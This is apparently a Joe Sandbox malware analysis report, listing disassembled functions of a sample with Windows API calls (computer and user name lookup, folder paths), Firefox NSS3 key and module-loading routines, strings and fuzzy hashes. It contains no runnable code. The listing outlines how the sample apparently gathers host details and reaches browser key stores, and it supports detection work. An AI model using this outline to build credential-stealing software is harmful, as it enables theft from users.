Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2bde64b4f7e7231a3517be2c96d67b638509f2a4ea4281addbaafb0f515e4d7c
Instruction ID: 05b335d21f22619e77aa966aeb7f376ddd46b9d978e537c949d5f100d696e3dd
Opcode Fuzzy Hash: 2bde64b4f7e7231a3517be2c96d67b638509f2a4ea4281addbaafb0f515e4d7c
Instruction Fuzzy Hash: 70F01570C0020CEFCB04EFA5C9496DDBB75EB00324F50859EE82AA7281DBB85B95CB85

Function 00418880 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 51571f28d6a7ed4813964dc8c522bdbe61ee22cda778a467bc1242f5a69e0a37
Instruction ID: 7b71b80bc5ec6c4d76f30a423bf4d75a71df8f4b6dd8708b5fa25dfbbe6c75fa
Opcode Fuzzy Hash: 51571f28d6a7ed4813964dc8c522bdbe61ee22cda778a467bc1242f5a69e0a37
Instruction Fuzzy Hash: 7AE01A31A4034C7BDB55EBA0CC96FEE736CAB44B15F004299BA0C5B1C0EE74AB858B91

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
Instruction ID: 84cbab3e625f5c703ca2aee7bdcd0b4d96e9050e400d57d2133d1b743e823249
Opcode Fuzzy Hash: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
Instruction Fuzzy Hash: 8EE0C27190070222DB2033B66C06B6B329D0B1435DF00052EFA08D7252FE3CF81182AC

Function 004188D0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 69e24b86b28bd7b079a6e9cca7457a077172f38b64f4847235a515cc131b290b
Instruction ID: 18df4f3d1847af864b4cf5612dd8d404a1e3ff34582bf4e0d6244d1823b45961
Opcode Fuzzy Hash: 69e24b86b28bd7b079a6e9cca7457a077172f38b64f4847235a515cc131b290b
Instruction Fuzzy Hash: B301FBB491420CEBCB14CF98D585BEC7BB5EF04308F248089D9456B350C7785F84DB4A

Function 004098D0 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 004098D8

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 1aee106081fe82a84b5a838b5431766f4324473991f19cdffcfc85f73d7ea574
Instruction ID: 85591d8b2077324c158e0d5cdc0cd752fc6e9f2d8541dbcaab8872a49f7b11e9
Opcode Fuzzy Hash: 1aee106081fe82a84b5a838b5431766f4324473991f19cdffcfc85f73d7ea574
Instruction Fuzzy Hash: CFF054B4D00208FBDB00EFA5C946B9EB7B4AB08304F1085A9FD05A7381E6749B00CB95

Non-executed Functions

Function 6C6B6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C802120,6C6B7E60), ref: 6C6B6EBC
TlsGetValue.KERNEL32 ref: 6C6B6EDF
EnterCriticalSection.KERNEL32(?), ref: 6C6B6EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C6B6F25

Part of subcall function 6C68A900: TlsGetValue.KERNEL32(00000000,?,6C8014E4,?,6C624DD9), ref: 6C68A90F
Part of subcall function 6C68A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C68A94F

PR_Unlock.NSS3 ref: 6C6B6F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C6B6FA9
TlsGetValue.KERNEL32 ref: 6C6B70B4
EnterCriticalSection.KERNEL32(?), ref: 6C6B70C8
PR_CallOnce.NSS3(6C8024C0,6C6F7590), ref: 6C6B7104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6B7117
SECOID_Init.NSS3 ref: 6C6B7128
PORT_Alloc_Util.NSS3(00000057), ref: 6C6B714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B71A9
PR_NotifyAllCondVar.NSS3 ref: 6C6B71CF
PR_Unlock.NSS3 ref: 6C6B71DD
free.MOZGLUE(?), ref: 6C6B71EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6B7208
free.MOZGLUE(00000000), ref: 6C6B7221
free.MOZGLUE(00000001), ref: 6C6B7235
TlsGetValue.KERNEL32 ref: 6C6B724A
EnterCriticalSection.KERNEL32(?), ref: 6C6B725E
PR_NotifyCondVar.NSS3 ref: 6C6B7273
PR_Unlock.NSS3 ref: 6C6B7281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C6B7291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B72B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B72D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B72E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B7301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B7310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B7335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B7344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B7363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B7372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C7F0148,,defaultModDB,internalKeySlot), ref: 6C6B74CC
free.MOZGLUE(00000000), ref: 6C6B7513
free.MOZGLUE(00000000), ref: 6C6B751B
free.MOZGLUE(00000000), ref: 6C6B7528
free.MOZGLUE(00000000), ref: 6C6B753C
free.MOZGLUE(00000000), ref: 6C6B7550
free.MOZGLUE(00000000), ref: 6C6B7561
free.MOZGLUE(00000000), ref: 6C6B7572
free.MOZGLUE(00000000), ref: 6C6B7583
free.MOZGLUE(00000000), ref: 6C6B7594
free.MOZGLUE(00000000), ref: 6C6B75A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C6B75BD
free.MOZGLUE(00000000), ref: 6C6B75C8
free.MOZGLUE(00000000), ref: 6C6B75F1
PR_NewLock.NSS3 ref: 6C6B7636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C6B7686
PR_NewLock.NSS3 ref: 6C6B76A2

Part of subcall function 6C7698D0: calloc.MOZGLUE(00000001,00000084,6C690936,00000001,?,6C69102C), ref: 6C7698E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C6B76B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C6B7707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C6B771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C6B7731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C6B774A
DeleteCriticalSection.KERNEL32(?), ref: 6C6B7770
free.MOZGLUE(?), ref: 6C6B7779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B77AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C6B77C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6B77DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C6B7821
PORT_Alloc_Util.NSS3(?), ref: 6C6B7837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C6B785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6B786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C6B78AC
free.MOZGLUE(00000000), ref: 6C6B78BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C6B78F3
free.MOZGLUE(00000000), ref: 6C6B78FC
free.MOZGLUE(00000000), ref: 6C6B791C

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

Strings

dll, xrefs: 6C6B788E
dbm:, xrefs: 6C6B7716
extern:, xrefs: 6C6B772B
kbi., xrefs: 6C6B7886
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C6B74C7
NSS Internal Module, xrefs: 6C6B74A2, 6C6B74C6
,defaultModDB,internalKeySlot, xrefs: 6C6B748D, 6C6B74AA
rdb:, xrefs: 6C6B7744
Spac, xrefs: 6C6B7389
sql:, xrefs: 6C6B76FE

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 699cdbc8f1d3234747a9bf2271b055333d0bf6438b916cce4d8f5776333ad1aa
Instruction ID: e4e90f2b4150353415d2529149344293a14b5ba31effc349004def045958feec
Opcode Fuzzy Hash: 699cdbc8f1d3234747a9bf2271b055333d0bf6438b916cce4d8f5776333ad1aa
Instruction Fuzzy Hash: 9F5203B1E012059BEF208F64DD497AA7BB4BF06308F144039ED19B6B41E771E964CBE9

Function 6C704840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C6E601B,?,00000000,?), ref: 6C70486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C7048A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C7048BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C7048DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C7048F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C70490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C704919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C70493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C704970
PORT_Alloc_Util.NSS3(00000001), ref: 6C7049A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7049AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7049D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C7049F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C704A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C704A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C704A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C704A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C704A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C704A81
free.MOZGLUE(00000000), ref: 6C704AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C704ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C704ADC
free.MOZGLUE(00000000), ref: 6C704B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C704B33

Part of subcall function 6C704120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70413D
Part of subcall function 6C704120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C704162
Part of subcall function 6C704120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70416B
Part of subcall function 6C704120: PL_strncasecmp.NSS3(2Bpl,?,00000001), ref: 6C704187
Part of subcall function 6C704120: NSSUTIL_ArgSkipParameter.NSS3(2Bpl), ref: 6C7041A0
Part of subcall function 6C704120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7041B4
Part of subcall function 6C704120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C7041CC
Part of subcall function 6C704120: NSSUTIL_ArgFetchValue.NSS3(2Bpl,?), ref: 6C704203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C704B53
free.MOZGLUE(00000000), ref: 6C704B94
free.MOZGLUE(?), ref: 6C704BA7
free.MOZGLUE(00000000), ref: 6C704BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C704BC8

Strings

hasRootCerts, xrefs: 6C704AD6
every, xrefs: 6C704A66
timeout, xrefs: 6C704A38, 6C704A7B
slotFlags, xrefs: 6C704A22
askpw, xrefs: 6C704A4A
rootFlags, xrefs: 6C704AB9, 6C704B2E
hasRootTrust, xrefs: 6C704B4D

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: cadc7518a5f8c0e6cc0fd4c86ba533a64900e6e926a28ee01f3dd3833104d68b
Instruction ID: 51c6f45140483837e9ff3a611500b7018d733b4a43531fddfb93fcd267c55a13
Opcode Fuzzy Hash: cadc7518a5f8c0e6cc0fd4c86ba533a64900e6e926a28ee01f3dd3833104d68b
Instruction Fuzzy Hash: 88C115F0F052559BEB108F699E44BAE7BF8AF26308F140078EC95A7B41E731E914D7A1

Function 6C6C6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C7CA8EC,0000006C), ref: 6C6C6DC6
memcpy.VCRUNTIME140(?,6C7CA958,0000006C), ref: 6C6C6DDB
memcpy.VCRUNTIME140(?,6C7CA9C4,00000078), ref: 6C6C6DF1
memcpy.VCRUNTIME140(?,6C7CAA3C,0000006C), ref: 6C6C6E06
memcpy.VCRUNTIME140(?,6C7CAAA8,00000060), ref: 6C6C6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6C6E38

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C6C6E76
TlsGetValue.KERNEL32 ref: 6C6C726F
EnterCriticalSection.KERNEL32(?), ref: 6C6C7283

Strings

!, xrefs: 6C6C7123

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: bb5b25de80c89230955b6d869c64dc80b7b735e9f7465b19776c5ddcfbe4fae0
Instruction ID: e1a3f3c3b0cdbfbaf0a11603cd4f11606eed7478759234d474c7a3da5d80828f
Opcode Fuzzy Hash: bb5b25de80c89230955b6d869c64dc80b7b735e9f7465b19776c5ddcfbe4fae0
Instruction Fuzzy Hash: 60728FB5E052199FDF60DF28CC8879ABBB5EF49304F1441A9D80CA7701D7319A85CF96

Function 6C70AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C70ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C70ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C70ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C70AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C70ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70ADF0

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C70B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C70B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C70B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C70B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C70B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70B40C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 85aa86f44faa217b05d3921193ba376060ecc42ed50ff59ceef67448e867c5c0
Instruction ID: c7f3dd64b41c49f57da9301c2ebd90c9d0ada1eee08b99f403ee1d39dbd7c306
Opcode Fuzzy Hash: 85aa86f44faa217b05d3921193ba376060ecc42ed50ff59ceef67448e867c5c0
